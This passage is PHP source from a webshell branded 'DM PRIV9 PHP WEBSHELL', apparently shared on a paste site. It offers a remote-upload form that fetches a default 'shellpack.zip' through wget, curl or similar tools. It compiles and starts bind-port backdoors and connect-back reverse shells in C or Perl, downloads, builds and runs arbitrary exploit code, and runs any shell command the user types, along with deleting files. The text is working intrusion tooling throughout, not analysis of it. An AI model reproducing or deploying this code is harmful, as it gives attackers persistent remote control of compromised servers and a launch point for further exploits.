- <tr><th colspan="2"><b><span class='b12'> _UPLOAD FROM URL_</span></b></th></tr>
- <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?dm=<?php echo $pwd; ?>&x=upload">
- <table>
- <tr>
- <td>URL : </td>
- <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://dm-zone.us/shellpack.zip"></td></tr>
- <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
- <tr><td>
- <select size="1" class="inputz" name="pilihan">
- <option value="wwget">wget</option>
- <option value="wlynx">lynx</option>
- <option value="wfread">fread</option>
- <option value="wfetch">fetch</option>
- <option value="wlinks">links</option>
- <option value="wget">GET</option>
- <option value="wcurl">curl</option>
- </select></td>
- <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td></tr>
- </table></form></td> </tr></table>
- <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
- <?php }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
- if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
- $port = trim($_POST['port']);
- $passwrd = trim($_POST['bind_pass']);
- tulis("bdc.c",$port_bind_bd_c);
- exe("gcc -o bdc bdc.c");
- exe("chmod 777 bdc");
- @unlink("bdc.c");
- exe("./bdc ".$port." ".$passwrd." &");
- $scan = exe("ps aux");
- if(eregi("./bdc $por",$scan)){
- $msg = "<p>Process found running, backdoor setup successfully.</p>";
- }
- else {
- $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
- }
- }
- elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
- $port = trim($_POST['port']);
- $passwrd = trim($_POST['bind_pass']);
- tulis("bdp",$port_bind_bd_pl);
- exe("chmod 777 bdp");
- $p2=which("perl");
- exe($p2." bdp ".$port." &");
- $scan = exe("ps aux");
- if(eregi("$p2 bdp $port",$scan)){
- $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
- else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
- }
- }
- elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
- $ip = trim($_POST['ip']);
- $port = trim($_POST['backport']);
- tulis("bcc.c",$back_connect_c);
- exe("gcc -o bcc bcc.c");
- exe("chmod 777 bcc");
- @unlink("bcc.c");
- exe("./bcc ".$ip." ".$port." &");
- $msg = "Now script try connect to ".$ip." port ".$port." ...";
- }
- elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
- $ip = trim($_POST['ip']);
- $port = trim($_POST['backport']);
- tulis_2("bcp",$back_connect);
- exe("chmod +x bcp");
- $p2=which("perl");
- exe($p2." bcp ".$ip." ".$port." &");
- sleep(1);
- $msg = "Now script try connect to ".$ip." port ".$port." ...";
- unlink("bcp");
- }
- elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
- $pilihan = trim($_POST['pilihan']);
- $wurl = trim($_POST['wurl']);
- $namafile = download($pilihan,$wurl);
- if(is_file($namafile)) { $msg = exe($wcmd); }
- else $msg = "error: file not found $namafile";
- }
- ?>
- <table class="tabnet"><tr>
- <th>Port Binding</th>
- <th>Connect Back</th>
- <th>Load and Exploit</th></tr>
- <tr><td>
- <form method="post" actions="?dm=<?php echo $pwd; ?>&x=netsploit">
- <table><tr><td>Port</td>
- <td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
- <tr><td>Password</td>
- <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
- <tr><td>Use</td>
- <td style="text-align:justify">
- <p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px"></td></tr></table>
- </form></td>
- <td> <form method="post" actions="?dm=<?php echo $pwd; ?>&x=netsploit">
- <table><tr><td>IP</td>
- <td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>">
- </td>
- </tr>
- <tr><td>Port</td>
- <td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
- <tr><td>Use</td>
- <td style="text-align:justify">
- <p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px"></td></tr></table> </form> </td>
- <td> <form method="post" actions="?dm=<?php echo $pwd; ?>&x=netsploit">
- <table> <tr><td>url</td>
- <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
- <tr><td>cmd</td>
- <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr>
- <tr><td><select size="1" class="inputz" name="pilihan">
- <option value="wwget">wget</option>
- <option value="wlynx">lynx</option>
- <option value="wfread">fread</option>
- <option value="wfetch">fetch</option>
- <option value="wlinks">links</option> <option value="wget">GET</option>
- <option value="wcurl">curl</option>
- </select></td>
- <td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;"></td></tr></table></form </td></tr></table>
- <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
- <?php }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')) {
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=shell"method="post">
- <table class="cmdbox"> <tr>
- <td colspan="2">
- <textarea class="output"> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> </td></tr>
- <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
- </table></form>
- <?php
- } else {
- if(isset($_GET['delete']) && ($_GET['delete'] != "")){
- $file = $_GET['delete']; @unlink($file);
- }
- elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
- delete_option($_GET['fdelete']);
- }
- elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
- $path = $pwd.$_GET['mkdir']; @mkdir($path);
- }
- $buff = showdir($pwd,$prompt);
- echo $buff;
- }
- ?>
- <!-- DM-5HELL FOOTER -->
- <div align="center">
- <br>
- <!-- DM-5HELL -->
- <br>
- <table class="tabnet" style="width:700px;padding:0 1px;">
- <tr><td align="center" colspan="2">
- <nobr><span class='b12'>WE DO IT WE WANT BECAUSE WE CAN</span>
- </td></tr>
- <tr><td align="center" colspan="2">
- <nobr><span class='b12'>DM PRIV9 PHP WEBSHELL © 2013 </span>
- </td></tr>
- </table><br><br>
- </html><!-- DM-5HELL -->
- </div></div></body></html>
- <!-- END OF DM-5HELL -->
Add Comment
Please, Sign In to add comment